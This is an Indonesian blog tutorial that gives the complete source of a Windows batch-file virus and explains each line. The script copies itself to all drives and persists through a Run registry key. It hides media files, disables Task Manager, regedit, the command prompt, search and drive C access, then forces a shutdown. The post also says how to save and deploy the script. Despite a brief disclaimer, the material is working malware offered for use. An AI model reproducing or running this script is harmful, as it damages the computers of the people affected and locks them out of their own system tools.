cara bikin virus mudah dengan notepad

Selasa, 14 Februari 2012
Bikin virus mudah dengan notepad

Oke kali ini saya akan berbagi sedikit, bagaimana cara membuat virus dengan cepat tetapi efeknya lumayan lah buat iseng eiteit saya nggak ngajarin kalian buat iseng atau berbuat jahat lo jadi kalo ada diantara kalian yang menyalahgunakannya, saya tidak bertanggung jawab, karena saya percaya diantara kalian semuanya orang-orang baik (Inget : kalo kita dijailin orang nggak suka kan, gimana kalo kita dijailin orang lain, pengen marah kan?? ). Lalu knapa ngajarin bikin virus?? Mungkin gitu ya pertanyaan kamu, oke deh saya jawab orang yang bikin virus, pasti bisa juga bikin anti virusnya kalo kagak bisa keterlaluan dech nah untuk itu, kalo computer kita kena virus n kita bisa tahu kerja virus itu, kita akan bisa sendiri basmi tu virus tanpa antivirus, sebagaimana yang saya alami kemarin.. (tugas makalah 50 hal mau dikumpulin, eh kna virus.., antivirus terbaru kagak bs semua, untung bisa kembaliin)
Mungkin kita akan berfikir, bikin virus tu susah amat.. yang pake bahasa VB lah, C++ apalagi pake bahasa Assembly wuih bisa mbeler tu emang bikin virus pake bahasa pemrograman itu bisa, tapi kali ini kita akan bikin virus dengan software yang udah ada di windows, kita akan gunakan notepad untuk bikin virus batch, jadi kagak terlalu rumit bikin virusnya n mudah dipahami
Langsung aja saya berikan script virusnya, pembahasannya dibawah aja ya (no 1,2, dsb tu Cuma no baris aja, nggak usah ditulis, tu agar mudah aja jelasinnya he. )
1. Echo off > C:\virxx.txt
2. if no exist C:\Windows\%0 copy %0 C:\Windows
3. for %%p in (A C D E F G H) do copy %0 %%p:
4. for %%q in (A C D E F G H) do dir %%q:\*.3gp /B /S >> C:\virxx.txt
5. for %%r in (A C D E F G H) do attrib +h +s %%r:\*.3gp /s
6. REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowSuperHiden /t REG_DWORD /d 0 /f
7. REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f
8. REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
9. REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d 1 /f
10. REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
11. REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v gorun /t REG_SZ /d C:\Windows\virxx.bat /f
12. REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewOnDrive /t REG_DWORD /d 4 /f
13. REG ADD HKCU\Software\Policies\Microsoft\Windows\System DisableCMD /t REG_DWORD /d 2 /f
14. REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegedit /t REG_DWORD /d 1 /f
15. Shutdown -s -t 360 -c “Virus Menjangkiti Komputer Anda” -f
16. Exit
Baris 1 : echo berfungsi untuk menampilkan pesan atau komentar yang diberikan user. Untuk lebih nyaman waktu tampil di command promt tambahkan “off” sehingga menjadi echo off
Baris 2 : digunakan agar virus memeriksa dirinya atau kembarannya atau jurus seribu bayangan yang telah berada diderektori C:\Windows ataukan kagak ada. Jika nggak ada maka akan mengeluarkan jurusnya kederiktori tersebut. %0 digunakan untuk menghandle nama dirinya sendiri
Baris 3 : digunakan untuk pengcopyan file virus ke drive A, C, D, E, F, G, dan H. perintah itu kita menggunakan perulangan agar penulisannya dapat dipersingkat. %%variabel atau %%p diatas adalah untuk menangani file dengan nama yang terlalu panjang, dan %0 untuk menghandle dirinya sendiri
Baris 4 : melakukan pendataan file berekstensi *.3gp yang ada didrive A, C, D, E, F, G dan H. dan hasilnya akan ditampilkan di drive C yang ada pada file virxx.txt
Baris 5 : untuk menyembunyikan file berekstensi *.3gp. penyembunyiannya tidak hanya dalam mode hiden biasa tapi dalam super hiden. Perintah +h dan +s untuk memasang atribun hiden dan system hiden. Perintah untuk balikannya attrib -h -s , sedang perintah /S untuk proses attrib hingga subfolder
Baris 6 : untuk memberikan nilai DWORD 0 untuk value ShowSuperHiden. Maka semua file yang beratribut system file tidak akan ditampakkan. Untuk mengembalikannya, ganti nilai 0 tersebut menjadi nilai 1.
Baris 7 : untuk menghilangkan fasilitas tool folder options pada Windows Explorer, untuk mengembalikannya ganti value 1 menjadi 0 agar fasilitas tool folder options bisa digunakan lagi, mudah bukan
Baris 8 : untuk melarang akses task manager. Nilai 1 untuk mendisable task manager, untuk megembalikannya agar bisa gunakan ganti nilai 1 menjadi 0
Baris 9 : untuk menon aktifkan fasilitas pencarian atau search, untuk mengembalikan sama kayak perintah lainnya, tinggal ganti angka 1 menjadi 0
Baris 10 : fungsinya untuk menghilangkan fasilitas run pada Ms. Windows
Baris 11 : untuk menjalankan file virus virxx.txt yang ada diderektori C:\Windows setiap computer melakukan starup. Gorun dalam script tersebut menunjukkan string value baru yang dibentuk oleh perintah tersebut.
Baris 12 : untuk mencegah akses user ke drive C. Nilai 4 maksudnya drive yang dilarang adalah drive C, jika nilai 8 maka drive yang dilarang adalah drive D. ngerti kan???
Baris 13 : untuk mencegah penggunaan Comand Promt oleh user. Nilai 2 agar Command Promt tidak bisa diakses, namun file batch dapat jalan. Sedang nilai 0 akan menjalankan command promd dan file batch. Dan nilai 1 untuk mendisable keduanya (command promt dan file batch)
Baris 14 : untuk mengunci Registry Editor atau regedit agar tidak bisa diakses. Ganti aja nilai 1 jadi 0 untuk dapat mengakses lagi, menurut pengalaman saya, jika kamu nggak bisa gantinya (karena regedit nggak bisa diakses) gunaik script atau lebih gampangnya gunain software Tune Up Utilities.
Baris 15 : perintah yang kejam dan menyeramkan, mau tau kenapa?? Karena dengan hitungan 360 detik (yang saya berikan disitu) membuat computer akan shutdown dengan otomatis. Perintah -s digunakan untuk shutdown computer, jika -r maka akan melakukan restart. -c digunakan untuk menampilkan pesan dan -f untuk menutup paksa semua program yang lagi jalan-jalan :)
Warning :
  • Jangan lupa cukup gunakan notepad yang ada diwindows
  • Ketikkan scriptnya virus
  • Dan simpan dengan file nama apa aja, tapi inget ekstensinya harus *.bat contohnya virxx.bat , n pada save as type nya pilih All Files
save
  • Oia intinya kalo kamu bikin virus kayak tadi atau kamu ingin menambah atau mendesain kerja virusnya, kamu harus tahu tentang regedit, gampang kok, tutorialnya juga banyak udah pada bisa kan.
  • N satu lagi, ilmu bukan untuk menjailin atau berbuat jahat tapi ilmu tu untuk membuat manfaat bagi orang lain (sok bijak ni..)

0 komentar: